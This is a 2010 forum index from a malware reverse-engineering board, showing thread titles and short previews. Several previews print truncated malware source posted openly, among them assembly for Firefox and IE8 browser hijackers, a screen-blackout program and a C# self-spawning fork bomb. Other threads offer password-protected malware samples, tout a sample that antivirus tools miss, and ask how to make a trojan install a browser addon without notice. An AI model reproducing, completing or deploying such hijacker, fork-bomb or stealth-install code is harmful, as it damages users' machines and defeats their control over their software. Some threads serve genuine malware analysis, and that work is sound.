Malware Reverse Engineering

Mozilla Hijacker

August 2, 2010 by JMC31337

0 replies
5.4k views

felt like p0wning mozilla with tasm32 ;tasm32 /ml foxjak ;tlink32 -x -c -aa foxjak,,,import32 .386P Locals jumps .Model Flat ,StdCallinclude windows.inc include vkkey.incextrn FindWindowExA:PROC extrn FindWindowA:PROC extrn SendMessageA:PROC extrn ExitProcess:PROC extrn MessageBoxA:PROC extrn SetForegroundWindow:PROC extrn keybd_event:PROC extrn Sleep:PROC extrn SetActiveWindow:PROC extern ShowWindow:PROC extrn SetWindowTextA:PROC extern CreateDirectoryA:PROC extrn CopyFileA:PROC extrn RegOpenKeyExA :PROC ;open a key (see chapter _4_), with a subkey extrn RegCloseKey :PROC ;close a key extrn RegCreateKeyA :PROC ;create's a new subkey extrn Re…

Last reply by JMC31337, August 2, 2010

FAKE AV Virus

August 1, 2010 by JMC31337

0 replies
4.5k views

FAKE AV VIRUS Fake_AV_Aug_2010.rar rar passwd: infected

Last reply by JMC31337, August 1, 2010

IE8 Browser Hijack

July 26, 2010 by JMC31337

0 replies
3.6k views

plenty of examples of an IE 8 hijacker on the net heres one in tasm32 ;tasm32 /ml hijak ;tlink32 -x -c -aa hijak,,,import32 .386P Locals jumps .Model Flat ,StdCallinclude windows.incextrn FindWindowExA:PROC extrn FindWindowA:PROC extrn SendMessageA:PROC extrn ExitProcess:PROC extrn MessageBoxA:PROC extrn SetForegroundWindow:PROC extrn keybd_event:PROC extrn Sleep:PROCVK_RETURN equ 0Dh SW_SHOWNORMAL equ 1.data? buff db ?.data hwnd dd 0 ieclass db "IEFrame",0 ieworker db"WorkerW",0 ieadd db "Address Combo Control",0 ienav db "Navigation Bar",0 ierebar db "ReBarWindow32",0 iebar db "ToolBarWindow32",0 ieedit db "Edit",0 ieroot db"Address Band Root",0 addrs db "http://www.goo…

Last reply by JMC31337, July 26, 2010

Dr.mehdi.swensen PEiD v0.95

June 10, 2010 by Dr.mehdi.swensen.

12 replies
8.6k views

I give this to all my friends in forum I hope to be accepted by all Crackers. tnx Mod edit; Removed attachment since it's both a rip and a virus. Explain or actions will be taken. Mod edit2; Uploaded attachment and moved topic to Malicious Software Research forum for discussion. User is banned from the board. Attachment password is: tuts4you Dr.mehdi.swensen PEiD v0.95.zip

Last reply by crys18, July 25, 2010

Dual OS Virus

February 4, 2010 by cyb3rl0rd1867

5 replies
6.8k views

I recently heard about w32/simile virus that was dangerous for both linux and windows. More info here. I was curious to know what the header of such a file would look like, since microsoft uses Pe headers and linux uses elf headers. How would it be possible to make it compatible with both?

Last reply by Dooms_day, July 11, 2010

Malware+Custom Obfusc+No detections

June 30, 2010 by chickenbutt

4 replies
6.6k views

I didn't look to see what this does, beyong dropping binaries and making services. It has to be rebuilt to load in olly(the dropped binaries). KIS 2010,NIS 2010,Avira 2010 didn't detect with high heuristics. It's all ring 3 dfgdfgdgdgf.zip

Last reply by quosego, July 4, 2010

W32.BlackOut

June 18, 2010 by JMC31337

0 replies
6.4k views

black out the GUI .386 .model flat extrn MessageBoxA:proc extrn GetDC:proc extrn SetPixel:proc extrn GetSystemMetrics:proc extrn MessageBoxA:proc extrn GetPixel:PROC extrn BitBlt:PROC .data xc dd 0 ;width yc dd 0 ;height x dd 0 ;x-co y dd 0 ;y-co dc dd 0 .code start: xor eax,eax push eax call GetDC mov dword ptr dc,eax push 16 call GetSystemMetrics mov dword ptr xc,eax push 17 call GetSystemMetri…

Last reply by JMC31337, June 18, 2010

Netsky B

May 7, 2010 by JMC31337

3 replies
4.7k views

...

Last reply by Coderess, June 11, 2010

Flash / PDF 0day Analysis

June 10, 2010 by frank_boldewin

5 replies
4.1k views

http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/ sebastian and me worked on that the last 2 days. maybe someone is interested. cheers, frank

Last reply by Hyperlisk, June 10, 2010

C# Rabbit / Fork Bomb

June 4, 2010 by JMC31337

0 replies
6.5k views

//JMC31337 //THE MAIN FORM CODE using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics;namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { string startpointPath = Application.ExecutablePath; for (int x = 0; x < 999999999; x++) { MessageBox.Show("RABBIT", "Attention"); Process.Sta…

Last reply by JMC31337, June 4, 2010

Silent Firefox addon install

May 28, 2010 by Minister

1 reply
3.7k views

Good day, I am creating a small trojan and encountered one problem. The trojan installs an addon for FF and the problem is - FF notifies user about it, spitting out window with "New addons installed". Any ideas how to bypass it, at least a hint, please? I've googled it and searched in Mozilla support forums, but for obvious reasons, nobody is keen on answering it

Last reply by Loki, May 28, 2010

Explore the Vulnerability in the following snippets - Help Requried

May 18, 2010 by mystery_reverser

5 replies
6.1k views

Hello Guys, I am a newbie to reverse engineering vulnerabilities. Following are some of the vulnerable codes, for which I want to know the answer for the following questions. It would be great if you guys explain elaborately so that I can kick start my vulnerability analysis with a bang. Please help me out guys. You can mail me the answers to mysteryreverse@gmail.com or post it here as doc file. Regards, Mystery Here is the doc file!! Vulnerablitity.zip Vulnerablitity.doc

Last reply by Hyperlisk, May 19, 2010

WINDAZ, sLOTz, FALAFEL, KSCRACKiNG

May 13, 2010 by Aguila

3 replies
5.8k views

Some guy is spreading his bot via scene releases. Mirc.v7.0.Incl.Keymaker-WiNDAZ Nero.v9.9.4.26.0b.Incl.Keymaker-WiNDAZ ESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ JESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ Avast.Internet.Security.v5.0.545.Incl.Keymaker-WiNDAZJules.v2.0.Cracked-sLOTz Eastern.Slots.v3.0.Cracked-sLOTz Cortez.Treasure.v1.0.Cracked-sLOTzKaspersky.Keygen.V1.WORKiNG.WiNALL-KSCRACKiNGWINX.HD.CAMCORDER.VIDEO.CONVERTER.V3.0-FALAFEL FRESH.VIEW.V7.94.READ.NFO-FALAFEL FRESH.DOWNLOAD.V8.48.READ.NFO-FALAFEL ........ Let's analyze his "work". idx.exe -> Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - Overlay : 2F7C5C... Nothing discov…

Last reply by deepzero, May 18, 2010

Spyware and or adware ?

May 18, 2010 by iamlegend

2 replies
3.5k views

Hey guys i know this is maybe not software but in any chance, do u have an example of spyware or adware script ? or maybe a site or something out there have these threats ? i need one or two for my research.. like AdWare.Win32.Virtumonde or AdWare.Win32.Dm.vv thanks in advance

Last reply by iamlegend, May 18, 2010

HTML CRYPTO TROJAN

May 17, 2010 by JMC31337

0 replies
3.6k views

...

Last reply by JMC31337, May 17, 2010

Interesting Stuff

April 29, 2010 by cyb3rl0rd1867

5 replies
6.9k views

Here are some interesting samples I came across while disinfecting someone's machine. Let me know if you come across something interesting! Kaspersky Names: Trojan.win32.scar.bzuz Password:tuts4you syre32.rar

Last reply by JMC31337, May 15, 2010

Introduction to various file infection techniques

March 21, 2010 by Kurapica

5 replies
4.6k views

An overview with some examples, written by ir3t from Black Storm Who said girls can't code !!? />http://portal.b-at-s.info/download.php?view.454

Last reply by JMC31337, May 13, 2010

C# Replicator

May 9, 2010 by JMC31337

0 replies
4.4k views

... moved to vxheavens

Last reply by JMC31337, May 9, 2010

Mytob@MM

May 8, 2010 by JMC31337

0 replies
3.2k views

...

Last reply by JMC31337, May 8, 2010